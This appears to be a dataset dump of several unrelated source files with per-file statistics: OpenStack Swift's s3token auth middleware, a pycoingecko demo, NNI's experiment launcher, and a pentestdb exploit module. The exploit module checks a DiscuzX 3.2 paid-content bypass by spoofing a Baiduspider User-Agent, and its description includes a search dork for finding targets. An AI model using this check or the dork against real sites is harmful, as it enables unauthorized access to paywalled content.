"""Handle incoming request. authenticate and send downstream."""
req = Request(environ)
self._logger.debug('Calling S3Token middleware.')
# Always drop auth headers if we're first in the pipeline
if 'keystone.token_info' not in req.environ:
req.headers.update({h: None for h in KEYSTONE_AUTH_HEADERS})
try:
parts = split_path(req.path, 1, 4, True)
version, account, container, obj = parts
except ValueError:
msg = 'Not a path query: %s, skipping.' % req.path
self._logger.debug(msg)
return self._app(environ, start_response)
# Read request signature and access id.
s3_auth_details = req.environ.get('swift3.auth_details')
if not s3_auth_details:
msg = 'No authorization deatils from Swift3. skipping.'
self._logger.debug(msg)
return self._app(environ, start_response)
access = s3_auth_details['access_key']
if isinstance(access, six.binary_type):
access = access.decode('utf-8')
signature = s3_auth_details['signature']
if isinstance(signature, six.binary_type):
signature = signature.decode('utf-8')
string_to_sign = s3_auth_details['string_to_sign']
if isinstance(string_to_sign, six.text_type):
string_to_sign = string_to_sign.encode('utf-8')
token = base64.urlsafe_b64encode(string_to_sign).encode('ascii')
# NOTE(chmou): This is to handle the special case with nova
# when we have the option s3_affix_tenant. We will force it to
# connect to another account than the one
# authenticated. Before people start getting worried about
# security, I should point that we are connecting with
# username/token specified by the user but instead of
# connecting to its own account we will force it to go to an
# another account. In a normal scenario if that user don't
# have the reseller right it will just fail but since the
# reseller account can connect to every account it is allowed
# by the swift_auth middleware.
force_tenant = None
if ':' in access:
access, force_tenant = access.split(':')
# Authenticate request.
creds = {'credentials': {'access': access,
'token': token,
'signature': signature}}
memcache_client = None
memcache_token_key = 's3secret/%s' % access
if self._secret_cache_duration > 0:
memcache_client = cache_from_env(environ)
cached_auth_data = None
if memcache_client:
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
headers, token_id, tenant, secret = cached_auth_data
if six.PY2 and isinstance(secret, six.text_type):
secret = secret.encode('utf-8')
if s3_auth_details['check_signature'](secret):
self._logger.debug("Cached creds valid")
else:
self._logger.debug("Cached creds invalid")
cached_auth_data = None
if not cached_auth_data:
creds_json = json.dumps(creds)
self._logger.debug('Connecting to Keystone sending this JSON: %s',
creds_json)
# NOTE(vish): We could save a call to keystone by having
# keystone return token, tenant, user, and roles
# from this call.
#
# NOTE(chmou): We still have the same problem we would need to
# change token_auth to detect if we already
# identified and not doing a second query and just
# pass it through to swiftauth in this case.
try:
# NB: requests.Response, not swob.Response
tx_id = environ.get('swift.trans_id', 'UNKNOWN')
resp = self._json_request(creds_json, tx_id)
except HTTPException as e_resp:
if self._delay_auth_decision:
msg = ('Received error, deferring rejection based on '
'error: %s')
self._logger.debug(msg, e_resp.status)
return self._app(environ, start_response)
else:
msg = 'Received error, rejecting request with error: %s'
self._logger.debug(msg, e_resp.status)
# NB: swob.Response, not requests.Response
return e_resp(environ, start_response)
self._logger.debug('Keystone Reply: Status: %d, Output: %s',
resp.status_code, resp.content)
try:
token = resp.json()
if 'access' in token:
headers, token_id, tenant = parse_v2_response(token)
elif 'token' in token:
headers, token_id, tenant = parse_v3_response(token)
else:
raise ValueError
if memcache_client:
user_id = headers.get('X-User-Id')
if not user_id:
raise ValueError
try:
cred_ref = self.keystoneclient.ec2.get(
user_id=user_id,
access=access)
memcache_client.set(
memcache_token_key,
(headers, token_id, tenant, cred_ref.secret),
time=self._secret_cache_duration)
self._logger.debug("Cached keystone credentials")
except Exception:
self._logger.warning("Unable to cache secret",
exc_info=True)
# Populate the environment similar to auth_token,
# so we don't have to contact Keystone again.
#
# Note that although the strings are unicode following json
# deserialization, Swift's HeaderEnvironProxy handles ensuring
# they're stored as native strings
req.environ['keystone.token_info'] = token
except (ValueError, KeyError, TypeError):
if self._delay_auth_decision:
error = ('Error on keystone reply: %d %s - '
'deferring rejection downstream')
self._logger.debug(error, resp.status_code, resp.content)
return self._app(environ, start_response)
else:
error = ('Error on keystone reply: %d %s - '
'rejecting request')
self._logger.debug(error, resp.status_code, resp.content)
return self._deny_request('InvalidURI')(
environ, start_response)
req.headers.update(headers)
req.headers['X-Auth-Token'] = token_id
tenant_to_connect = force_tenant or tenant['id']
if six.PY2 and isinstance(tenant_to_connect, six.text_type):
tenant_to_connect = tenant_to_connect.encode('utf-8')
self._logger.debug('Connecting with tenant: %s', tenant_to_connect)
new_tenant_name = '%s%s' % (self._reseller_prefix, tenant_to_connect)
environ['PATH_INFO'] = environ['PATH_INFO'].replace(account,
new_tenant_name)
return self._app(environ, start_response)
def filter_factory(global_conf, **local_conf):
"""Returns a WSGI filter app for use with paste.deploy."""
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return S3Token(app, conf)
return auth_filter
| 43.784141 | 79 | 0.574203 |
import base64
import json
from keystoneclient.v3 import client as keystone_client
from keystoneauth1 import session as keystone_session
from keystoneauth1 import loading as keystone_loading
import requests
import httplib
import six
from six.moves import urllib
from swift.common.swob import Request, HTTPBadRequest, HTTPUnauthorized, \
HTTPException, HTTPServiceUnavailable
from swift.common.utils import config_true_value, split_path, get_logger, \
cache_from_env
from swift.common.wsgi import ConfigFileError
from swift3.utils import is_valid_ipv6
PROTOCOL_NAME = 'S3 Token Authentication'
KEYSTONE_AUTH_HEADERS = (
'X-Identity-Status', 'X-Service-Identity-Status',
'X-Domain-Id', 'X-Service-Domain-Id',
'X-Domain-Name', 'X-Service-Domain-Name',
'X-Project-Id', 'X-Service-Project-Id',
'X-Project-Name', 'X-Service-Project-Name',
'X-Project-Domain-Id', 'X-Service-Project-Domain-Id',
'X-Project-Domain-Name', 'X-Service-Project-Domain-Name',
'X-User-Id', 'X-Service-User-Id',
'X-User-Name', 'X-Service-User-Name',
'X-User-Domain-Id', 'X-Service-User-Domain-Id',
'X-User-Domain-Name', 'X-Service-User-Domain-Name',
'X-Roles', 'X-Service-Roles',
'X-Is-Admin-Project',
'X-Service-Catalog',
'X-Tenant-Id',
'X-Tenant-Name',
'X-Tenant',
'X-User',
'X-Role',
)
def parse_v2_response(token):
access_info = token['access']
headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': ','.join(r['name']
for r in access_info['user']['roles']),
'X-User-Id': access_info['user']['id'],
'X-User-Name': access_info['user']['name'],
'X-Tenant-Id': access_info['token']['tenant']['id'],
'X-Tenant-Name': access_info['token']['tenant']['name'],
'X-Project-Id': access_info['token']['tenant']['id'],
'X-Project-Name': access_info['token']['tenant']['name'],
}
return (
headers,
access_info['token'].get('id'),
access_info['token']['tenant'])
def parse_v3_response(token):
token = token['token']
headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': ','.join(r['name']
for r in token['roles']),
'X-User-Id': token['user']['id'],
'X-User-Name': token['user']['name'],
'X-User-Domain-Id': token['user']['domain']['id'],
'X-User-Domain-Name': token['user']['domain']['name'],
'X-Tenant-Id': token['project']['id'],
'X-Tenant-Name': token['project']['name'],
'X-Project-Id': token['project']['id'],
'X-Project-Name': token['project']['name'],
'X-Project-Domain-Id': token['project']['domain']['id'],
'X-Project-Domain-Name': token['project']['domain']['name'],
}
return headers, None, token['project']
class S3Token(object):
def __init__(self, app, conf):
self._app = app
self._logger = get_logger(
conf, log_route=conf.get('log_name', 's3token'))
self._logger.debug('Starting the %s component', PROTOCOL_NAME)
self._timeout = float(conf.get('http_timeout', '10.0'))
if not (0 < self._timeout <= 60):
raise ValueError('http_timeout must be between 0 and 60 seconds')
self._reseller_prefix = conf.get('reseller_prefix', 'AUTH_')
self._delay_auth_decision = config_true_value(
conf.get('delay_auth_decision'))
self._request_uri = conf.get('auth_uri')
if not self._request_uri:
self._logger.warning(
"Use of the auth_host, auth_port, and auth_protocol "
"configuration options was deprecated in the Newton release "
"in favor of auth_uri. These options may be removed in a "
"future release.")
auth_host = conf.get('auth_host')
if not auth_host:
raise ConfigFileError('Either auth_uri or auth_host required')
elif is_valid_ipv6(auth_host):
auth_host = '[%s]' % auth_host
auth_port = int(conf.get('auth_port', 35357))
auth_protocol = conf.get('auth_protocol', 'https')
self._request_uri = '%s://%s:%s' % (auth_protocol, auth_host,
auth_port)
self._request_uri = self._request_uri.rstrip('/')
parsed = urllib.parse.urlsplit(self._request_uri)
if not parsed.scheme or not parsed.hostname:
raise ConfigFileError(
'Invalid auth_uri; must include scheme and host')
if parsed.scheme not in ('http', 'https'):
raise ConfigFileError(
'Invalid auth_uri; scheme must be http or https')
if parsed.query or parsed.fragment or '@' in parsed.netloc:
raise ConfigFileError('Invalid auth_uri; must not include '
'username, query, or fragment')
self._request_uri += '/v%s/s3tokens' % conf.get('auth_version', '2.0')
self._max_attempts = 1 + int(conf.get('max_retries', 1))
insecure = config_true_value(conf.get('insecure'))
cert_file = conf.get('certfile')
key_file = conf.get('keyfile')
if insecure:
self._verify = False
elif cert_file and key_file:
self._verify = (cert_file, key_file)
elif cert_file:
self._verify = cert_file
else:
self._verify = None
self.session = requests.Session()
self._secret_cache_duration = int(conf.get('secret_cache_duration', 0))
if self._secret_cache_duration > 0:
try:
auth_plugin = keystone_loading.get_plugin_loader(
conf.get('auth_type'))
available_auth_options = auth_plugin.get_options()
auth_options = {}
for option in available_auth_options:
name = option.name.replace('-', '_')
value = conf.get(name)
if value:
auth_options[name] = value
auth = auth_plugin.load_from_options(**auth_options)
session = keystone_session.Session(auth=auth)
self.keystoneclient = keystone_client.Client(session=session)
self._logger.info("Caching s3tokens for %s seconds",
self._secret_cache_duration)
except Exception:
self._logger.warning("Unable to load keystone auth_plugin. "
"Secret caching will be unavailable.",
exc_info=True)
self.keystoneclient = None
self._secret_cache_duration = 0
def _deny_request(self, code):
error_cls, message = {
'AccessDenied': (HTTPUnauthorized, 'Access denied'),
'InvalidURI': (HTTPBadRequest,
'Could not parse the specified URI'),
'ServiceUnavailable': (HTTPServiceUnavailable,
'Service unavailable'),
}[code]
resp = error_cls(content_type='text/xml')
error_msg = ('<?xml version="1.0" encoding="UTF-8"?>\r\n'
'<Error>\r\n <Code>%s</Code>\r\n '
'<Message>%s</Message>\r\n</Error>\r\n' %
(code, message))
if six.PY3:
error_msg = error_msg.encode()
resp.body = error_msg
return resp
def _json_request(self, creds_json, tx_id):
headers = {
'Content-Type': 'application/json',
'X-Trans-Id': tx_id
}
for attempt in range(self._max_attempts):
try:
response = self.session.post(
self._request_uri, headers=headers,
data=creds_json, verify=self._verify,
timeout=self._timeout)
except requests.exceptions.Timeout as e:
self._logger.info('HTTP timeout: %s', e)
raise self._deny_request('ServiceUnavailable')
except httplib.BadStatusLine as e:
self._logger.warning('HTTP request raised %s', e)
if attempt + 1 >= self._max_attempts:
raise self._deny_request('ServiceUnavailable')
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
except requests.exceptions.RequestException as e:
self._logger.warning('HTTP connection exception: %s', e)
# but a RequestException with a nested ProtocolError
# with BadStatusLine as message.
if 'BadStatusLine' in str(e) and \
attempt + 1 < self._max_attempts:
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
raise self._deny_request('InvalidURI')
if response.status_code >= 500:
self._logger.warning(
'Keystone reply error: status=%s reason=%s',
response.status_code, response.reason)
if attempt + 1 >= self._max_attempts:
raise self._deny_request('ServiceUnavailable')
self._logger.warning('retrying (%d/%d)',
attempt + 1, self._max_attempts - 1)
continue
elif response.status_code < 200 or response.status_code >= 300:
self._logger.debug('Keystone reply error: status=%s reason=%s',
response.status_code, response.reason)
raise self._deny_request('AccessDenied')
break
return response
def __call__(self, environ, start_response):
req = Request(environ)
self._logger.debug('Calling S3Token middleware.')
# Always drop auth headers if we're first in the pipeline
if 'keystone.token_info' not in req.environ:
req.headers.update({h: None for h in KEYSTONE_AUTH_HEADERS})
try:
parts = split_path(req.path, 1, 4, True)
version, account, container, obj = parts
except ValueError:
msg = 'Not a path query: %s, skipping.' % req.path
self._logger.debug(msg)
return self._app(environ, start_response)
s3_auth_details = req.environ.get('swift3.auth_details')
if not s3_auth_details:
msg = 'No authorization deatils from Swift3. skipping.'
self._logger.debug(msg)
return self._app(environ, start_response)
access = s3_auth_details['access_key']
if isinstance(access, six.binary_type):
access = access.decode('utf-8')
signature = s3_auth_details['signature']
if isinstance(signature, six.binary_type):
signature = signature.decode('utf-8')
string_to_sign = s3_auth_details['string_to_sign']
if isinstance(string_to_sign, six.text_type):
string_to_sign = string_to_sign.encode('utf-8')
token = base64.urlsafe_b64encode(string_to_sign).encode('ascii')
# have the reseller right it will just fail but since the
# reseller account can connect to every account it is allowed
# by the swift_auth middleware.
force_tenant = None
if ':' in access:
access, force_tenant = access.split(':')
# Authenticate request.
creds = {'credentials': {'access': access,
'token': token,
'signature': signature}}
memcache_client = None
memcache_token_key = 's3secret/%s' % access
if self._secret_cache_duration > 0:
memcache_client = cache_from_env(environ)
cached_auth_data = None
if memcache_client:
cached_auth_data = memcache_client.get(memcache_token_key)
if cached_auth_data:
headers, token_id, tenant, secret = cached_auth_data
if six.PY2 and isinstance(secret, six.text_type):
secret = secret.encode('utf-8')
if s3_auth_details['check_signature'](secret):
self._logger.debug("Cached creds valid")
else:
self._logger.debug("Cached creds invalid")
cached_auth_data = None
if not cached_auth_data:
creds_json = json.dumps(creds)
self._logger.debug('Connecting to Keystone sending this JSON: %s',
creds_json)
# NOTE(vish): We could save a call to keystone by having
# keystone return token, tenant, user, and roles
# from this call.
#
# NOTE(chmou): We still have the same problem we would need to
# change token_auth to detect if we already
# identified and not doing a second query and just
# pass it through to swiftauth in this case.
try:
# NB: requests.Response, not swob.Response
tx_id = environ.get('swift.trans_id', 'UNKNOWN')
resp = self._json_request(creds_json, tx_id)
except HTTPException as e_resp:
if self._delay_auth_decision:
msg = ('Received error, deferring rejection based on '
'error: %s')
self._logger.debug(msg, e_resp.status)
return self._app(environ, start_response)
else:
msg = 'Received error, rejecting request with error: %s'
self._logger.debug(msg, e_resp.status)
# NB: swob.Response, not requests.Response
return e_resp(environ, start_response)
self._logger.debug('Keystone Reply: Status: %d, Output: %s',
resp.status_code, resp.content)
try:
token = resp.json()
if 'access' in token:
headers, token_id, tenant = parse_v2_response(token)
elif 'token' in token:
headers, token_id, tenant = parse_v3_response(token)
else:
raise ValueError
if memcache_client:
user_id = headers.get('X-User-Id')
if not user_id:
raise ValueError
try:
cred_ref = self.keystoneclient.ec2.get(
user_id=user_id,
access=access)
memcache_client.set(
memcache_token_key,
(headers, token_id, tenant, cred_ref.secret),
time=self._secret_cache_duration)
self._logger.debug("Cached keystone credentials")
except Exception:
self._logger.warning("Unable to cache secret",
exc_info=True)
# Populate the environment similar to auth_token,
# so we don't have to contact Keystone again.
# they're stored as native strings
req.environ['keystone.token_info'] = token
except (ValueError, KeyError, TypeError):
if self._delay_auth_decision:
error = ('Error on keystone reply: %d %s - '
'deferring rejection downstream')
self._logger.debug(error, resp.status_code, resp.content)
return self._app(environ, start_response)
else:
error = ('Error on keystone reply: %d %s - '
'rejecting request')
self._logger.debug(error, resp.status_code, resp.content)
return self._deny_request('InvalidURI')(
environ, start_response)
req.headers.update(headers)
req.headers['X-Auth-Token'] = token_id
tenant_to_connect = force_tenant or tenant['id']
if six.PY2 and isinstance(tenant_to_connect, six.text_type):
tenant_to_connect = tenant_to_connect.encode('utf-8')
self._logger.debug('Connecting with tenant: %s', tenant_to_connect)
new_tenant_name = '%s%s' % (self._reseller_prefix, tenant_to_connect)
environ['PATH_INFO'] = environ['PATH_INFO'].replace(account,
new_tenant_name)
return self._app(environ, start_response)
def filter_factory(global_conf, **local_conf):
conf = global_conf.copy()
conf.update(local_conf)
def auth_filter(app):
return S3Token(app, conf)
return auth_filter
| true | true |
f726129b2b4b6cf86775da7c613d9ac7bd8cbcd9 | 1,396 | py | Python | exploit/cms_discuzx_3_2_authority_bypass.py | Micr067/pentestdb | 6aa06e1406589567d51ab63a88bfe47416e906e9 | [
"Apache-2.0"
] | 686 | 2016-02-06T15:11:12.000Z | 2022-03-30T10:55:29.000Z | exploit/cms_discuzx_3_2_authority_bypass.py | WinDyXuu/pentestdb | 6aa06e1406589567d51ab63a88bfe47416e906e9 | [
"Apache-2.0"
] | 6 | 2016-08-14T15:13:31.000Z | 2020-03-03T14:01:28.000Z | exploit/cms_discuzx_3_2_authority_bypass.py | WinDyXuu/pentestdb | 6aa06e1406589567d51ab63a88bfe47416e906e9 | [
"Apache-2.0"
] | 284 | 2015-12-19T07:42:05.000Z | 2022-03-13T11:58:38.000Z | #!/usr/bin/env python
#-*- coding:utf-8 -*-
'''
Pentestdb, a database for penetration test.
Copyright (c) 2015 alpha1e0
'''
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzAB(Exploit):
expName = u"DiscuzX 3.2绕过虚拟币支付查看内容"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "x3.2"
reference = ['http://www.secpulse.com/archives/33393.html','http://www.wooyun.org/bugs/wooyun-2010-099659']
description = u'''
漏洞利用条件:1.DiscuzX 3.2;2.没有其他权限设置
gh: inurl:forum.php "金币 才能浏览"
'''
def _verify(self):
result = Result(self)
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
#userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://**.**.**.**/search/spider.html)"
headers = {'User-Agent':userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code==200:
if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
result['fullpath'] = self.url
result['payload'] = userAgent
return result
| 29.702128 | 193 | 0.62894 |
from pentest.libs.exploit import Exploit
from pentest.libs.exploit import Result
class DiscuzAB(Exploit):
expName = u"DiscuzX 3.2绕过虚拟币支付查看内容"
version = "1.0"
author = "alpha1e0"
language = "php"
appName = "discuz"
appVersion = "x3.2"
reference = ['http://www.secpulse.com/archives/33393.html','http://www.wooyun.org/bugs/wooyun-2010-099659']
description = u'''
漏洞利用条件:1.DiscuzX 3.2;2.没有其他权限设置
gh: inurl:forum.php "金币 才能浏览"
'''
def _verify(self):
result = Result(self)
sig = u"才能浏览"
userAgent = "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)"
headers = {'User-Agent':userAgent}
response = self.http.get(self.url)
response2 = self.http.get(self.url, headers=headers)
if response2.status_code==200:
if sig.encode("utf-8") in response.content and sig.encode("gbk")in response.content and sig.encode("utf-8") not in response2.content and sig.encode("gbk") not in response2.content:
result['fullpath'] = self.url
result['payload'] = userAgent
return result
| true | true |
f72613e5e98b0d452caf3c66a76ef87d7056fcbc | 650 | py | Python | 006_pycoingecko_intro/app.py | peterhaasme/100daysofweb3 | 5d41ef2261733766c4b19e42cc8a9e6c4b52c75c | [
"Unlicense"
] | 1 | 2022-02-18T04:05:33.000Z | 2022-02-18T04:05:33.000Z | 006_pycoingecko_intro/app.py | peterhaasme/100daysofweb3 | 5d41ef2261733766c4b19e42cc8a9e6c4b52c75c | [
"Unlicense"
] | null | null | null | 006_pycoingecko_intro/app.py | peterhaasme/100daysofweb3 | 5d41ef2261733766c4b19e42cc8a9e6c4b52c75c | [
"Unlicense"
] | null | null | null | # 006_pycoingecko_intro
# explore pycoingecko usage
import json
from pprint import pprint
from pycoingecko import CoinGeckoAPI
cg = CoinGeckoAPI()
# Check API server status
ping = cg.ping()
pprint(ping)
# Get coin price
coin_price = cg.get_price(ids='bitcoin', vs_currencies='usd')
pprint(coin_price)
# Save all supported coins to json
# coins_list = cg.get_coins_list()
# with open('coins_list.json', 'w') as file:
# json.dump(coins_list, file)
# Save all supported coins market info to json
# coins_markets = cg.get_coins_markets(vs_currency='usd')
# with open('coins_markets.json', 'w') as file:
# json.dump(coins_markets, file)
#
| 22.413793 | 61 | 0.741538 |
import json
from pprint import pprint
from pycoingecko import CoinGeckoAPI
cg = CoinGeckoAPI()
ping = cg.ping()
pprint(ping)
coin_price = cg.get_price(ids='bitcoin', vs_currencies='usd')
pprint(coin_price)
| true | true |
f72614a99c832ad2bc453e1394d9ab2f30537e5f | 30,583 | py | Python | nni/tools/nnictl/legacy_launcher.py | dutxubo/nni | c16f4e1c89b54b8b80661ef0072433d255ad2d24 | [
"MIT"
] | null | null | null | nni/tools/nnictl/legacy_launcher.py | dutxubo/nni | c16f4e1c89b54b8b80661ef0072433d255ad2d24 | [
"MIT"
] | null | null | null | nni/tools/nnictl/legacy_launcher.py | dutxubo/nni | c16f4e1c89b54b8b80661ef0072433d255ad2d24 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import json
import os
from pathlib import Path
import sys
import string
import random
import time
import tempfile
import re
from subprocess import Popen, check_call, CalledProcessError, PIPE, STDOUT
from nni.experiment.config import ExperimentConfig, convert
from nni.tools.annotation import expand_annotations, generate_search_space
from nni.tools.package_utils.tuner_factory import get_builtin_module_class_name
from .launcher_utils import validate_all_content
from .rest_utils import rest_put, rest_post, check_rest_server, check_response
from .url_utils import cluster_metadata_url, experiment_url, get_local_urls, set_prefix_url
from .config_utils import Config, Experiments
from .common_utils import get_yml_content, get_json_content, print_error, print_normal, detect_port, get_user
from .constants import NNI_HOME_DIR, ERROR_INFO, REST_TIME_OUT, EXPERIMENT_SUCCESS_INFO, LOG_HEADER
from .command_utils import check_output_command, kill_command
from .nnictl_utils import update_experiment
k8s_training_services = ['kubeflow', 'frameworkcontroller', 'adl']
def get_log_path(experiment_id):
'''generate stdout and stderr log path'''
os.makedirs(os.path.join(NNI_HOME_DIR, experiment_id, 'log'), exist_ok=True)
stdout_full_path = os.path.join(NNI_HOME_DIR, experiment_id, 'log', 'nnictl_stdout.log')
stderr_full_path = os.path.join(NNI_HOME_DIR, experiment_id, 'log', 'nnictl_stderr.log')
return stdout_full_path, stderr_full_path
def print_log_content(config_file_name):
'''print log information'''
stdout_full_path, stderr_full_path = get_log_path(config_file_name)
print_normal(' Stdout:')
print(check_output_command(stdout_full_path))
print('\n\n')
print_normal(' Stderr:')
print(check_output_command(stderr_full_path))
def start_rest_server(port, platform, mode, experiment_id, foreground=False, log_dir=None, log_level=None, url_prefix=None):
'''Run nni manager process'''
if detect_port(port):
print_error('Port %s is used by another process, please reset the port!\n' \
'You could use \'nnictl create --help\' to get help information' % port)
exit(1)
if (platform not in ['local', 'aml']) and detect_port(int(port) + 1):
print_error('%s mode need an additional adjacent port %d, and the port %d is used by another process!\n' \
'You could set another port to start experiment!\n' \
'You could use \'nnictl create --help\' to get help information' % (platform, (int(port) + 1), (int(port) + 1)))
exit(1)
print_normal('Starting restful server...')
import nni_node
entry_dir = nni_node.__path__[0]
if (not entry_dir) or (not os.path.exists(entry_dir)):
print_error('Fail to find nni under python library')
exit(1)
entry_file = os.path.join(entry_dir, 'main.js')
if sys.platform == 'win32':
node_command = os.path.join(entry_dir, 'node.exe')
else:
node_command = os.path.join(entry_dir, 'node')
cmds = [node_command, '--max-old-space-size=4096', entry_file, '--port', str(port), '--mode', platform, \
'--experiment_id', experiment_id]
cmds += ['--action', mode]
if log_dir is not None:
cmds += ['--experiments-directory', log_dir]
if log_level is not None:
cmds += ['--log-level', log_level]
if foreground:
cmds += ['--foreground', 'true']
if url_prefix:
_validate_prefix_path(url_prefix)
set_prefix_url(url_prefix)
cmds += ['--url-prefix', url_prefix.strip('/')]
stdout_full_path, stderr_full_path = get_log_path(experiment_id)
with open(stdout_full_path, 'a+') as stdout_file, open(stderr_full_path, 'a+') as stderr_file:
start_time = time.time()
time_now = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(start_time))
#add time information in the header of log files
log_header = LOG_HEADER % str(time_now)
stdout_file.write(log_header)
stderr_file.write(log_header)
if sys.platform == 'win32':
from subprocess import CREATE_NEW_PROCESS_GROUP
if foreground:
process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=STDOUT, creationflags=CREATE_NEW_PROCESS_GROUP)
else:
process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file, creationflags=CREATE_NEW_PROCESS_GROUP)
else:
if foreground:
process = Popen(cmds, cwd=entry_dir, stdout=PIPE, stderr=PIPE)
else:
process = Popen(cmds, cwd=entry_dir, stdout=stdout_file, stderr=stderr_file)
return process, int(start_time * 1000)
def set_trial_config(experiment_config, port, config_file_name):
'''set trial configuration'''
request_data = dict()
request_data['trial_config'] = experiment_config['trial']
response = rest_put(cluster_metadata_url(port), json.dumps(request_data), REST_TIME_OUT)
if check_response(response):
return True
else:
print('Error message is {}'.format(response.text))
_, stderr_full_path = get_log_path(config_file_name)
if response:
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(response.text), indent=4, sort_keys=True, separators=(',', ':')))
return False
def set_adl_config(experiment_config, port, config_file_name):
'''set adl configuration'''
adl_config_data = dict()
# hack for supporting v2 config, need refactor
adl_config_data['adl_config'] = {}
response = rest_put(cluster_metadata_url(port), json.dumps(adl_config_data), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
set_V1_common_config(experiment_config, port, config_file_name)
result, message = setNNIManagerIp(experiment_config, port, config_file_name)
if not result:
return result, message
#set trial_config
return set_trial_config(experiment_config, port, config_file_name), None
def validate_response(response, config_file_name):
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
print_error('Error:' + err_message)
exit(1)
# hack to fix v1 version_check and log_collection bug, need refactor
def set_V1_common_config(experiment_config, port, config_file_name):
version_check = True
#debug mode should disable version check
if experiment_config.get('debug') is not None:
version_check = not experiment_config.get('debug')
#validate version check
if experiment_config.get('versionCheck') is not None:
version_check = experiment_config.get('versionCheck')
response = rest_put(cluster_metadata_url(port), json.dumps({'version_check': version_check}), REST_TIME_OUT)
validate_response(response, config_file_name)
if experiment_config.get('logCollection'):
data = json.dumps({'log_collection': experiment_config.get('logCollection')})
response = rest_put(cluster_metadata_url(port), data, REST_TIME_OUT)
validate_response(response, config_file_name)
def setNNIManagerIp(experiment_config, port, config_file_name):
'''set nniManagerIp'''
if experiment_config.get('nniManagerIp') is None:
return True, None
ip_config_dict = dict()
ip_config_dict['nni_manager_ip'] = {'nniManagerIp': experiment_config['nniManagerIp']}
response = rest_put(cluster_metadata_url(port), json.dumps(ip_config_dict), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
return True, None
def set_kubeflow_config(experiment_config, port, config_file_name):
'''set kubeflow configuration'''
kubeflow_config_data = dict()
kubeflow_config_data['kubeflow_config'] = experiment_config['kubeflowConfig']
response = rest_put(cluster_metadata_url(port), json.dumps(kubeflow_config_data), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
set_V1_common_config(experiment_config, port, config_file_name)
result, message = setNNIManagerIp(experiment_config, port, config_file_name)
if not result:
return result, message
#set trial_config
return set_trial_config(experiment_config, port, config_file_name), err_message
def set_frameworkcontroller_config(experiment_config, port, config_file_name):
'''set kubeflow configuration'''
frameworkcontroller_config_data = dict()
frameworkcontroller_config_data['frameworkcontroller_config'] = experiment_config['frameworkcontrollerConfig']
response = rest_put(cluster_metadata_url(port), json.dumps(frameworkcontroller_config_data), REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
set_V1_common_config(experiment_config, port, config_file_name)
result, message = setNNIManagerIp(experiment_config, port, config_file_name)
if not result:
return result, message
#set trial_config
return set_trial_config(experiment_config, port, config_file_name), err_message
def set_shared_storage(experiment_config, port, config_file_name):
if 'sharedStorage' in experiment_config:
data = json.dumps({'shared_storage_config': experiment_config['sharedStorage']})
response = rest_put(cluster_metadata_url(port), data, REST_TIME_OUT)
err_message = None
if not response or not response.status_code == 200:
if response is not None:
err_message = response.text
_, stderr_full_path = get_log_path(config_file_name)
with open(stderr_full_path, 'a+') as fout:
fout.write(json.dumps(json.loads(err_message), indent=4, sort_keys=True, separators=(',', ':')))
return False, err_message
return True, None
def set_experiment_v1(experiment_config, mode, port, config_file_name):
'''Call startExperiment (rest POST /experiment) with yaml file content'''
request_data = dict()
request_data['authorName'] = experiment_config['authorName']
request_data['experimentName'] = experiment_config['experimentName']
request_data['trialConcurrency'] = experiment_config['trialConcurrency']
request_data['maxExecDuration'] = experiment_config['maxExecDuration']
request_data['maxExperimentDuration'] = str(experiment_config['maxExecDuration']) + 's'
request_data['maxTrialNum'] = experiment_config['maxTrialNum']
request_data['maxTrialDuration'] = experiment_config['maxTrialDuration']
request_data['maxTrialNumber'] = experiment_config['maxTrialNum']
request_data['searchSpace'] = experiment_config.get('searchSpace')
request_data['trainingServicePlatform'] = experiment_config.get('trainingServicePlatform')
# hack for hotfix, fix config.trainingService undefined error, need refactor
request_data['trainingService'] = {'platform': experiment_config.get('trainingServicePlatform')}
if experiment_config.get('description'):
request_data['description'] = experiment_config['description']
if experiment_config.get('multiPhase'):
request_data['multiPhase'] = experiment_config.get('multiPhase')
